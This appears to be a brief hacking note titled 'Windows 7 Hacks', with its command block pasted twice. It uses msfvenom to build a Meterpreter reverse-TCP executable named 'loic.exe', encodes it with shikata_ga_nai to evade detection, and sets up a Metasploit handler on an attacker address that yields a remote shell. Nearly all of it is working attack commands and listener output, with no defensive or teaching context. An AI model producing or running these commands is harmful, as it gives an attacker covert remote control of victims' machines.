Sytem Hacking- Windows 7
Windows 7 Hacks
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.205.154 LPORT=6666 -f exe >loic.exe
if no arch selected error
-a x86 --platform Windows -e x86/shikata_ga_nai
-a x64
msfconsole
msf> Use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.4 (Attacker ip)
LHOST => 192.168.1.4
msf exploit(handler) > set LPORT 6666(Attacker port)
LPORT => 6666
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...
meterpreter> cd c:/
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.205.154 LPORT=6666 -f exe >loic.exe
if no arch selected error
-a x86 --platform Windows -e x86/shikata_ga_nai
-a x64
msfconsole
msf> Use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.4 (Attacker ip)
LHOST => 192.168.1.4
msf exploit(handler) > set LPORT 6666(Attacker port)
LPORT => 6666
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.1.4:6666
[*] Starting the payload handler...
meterpreter> cd c:/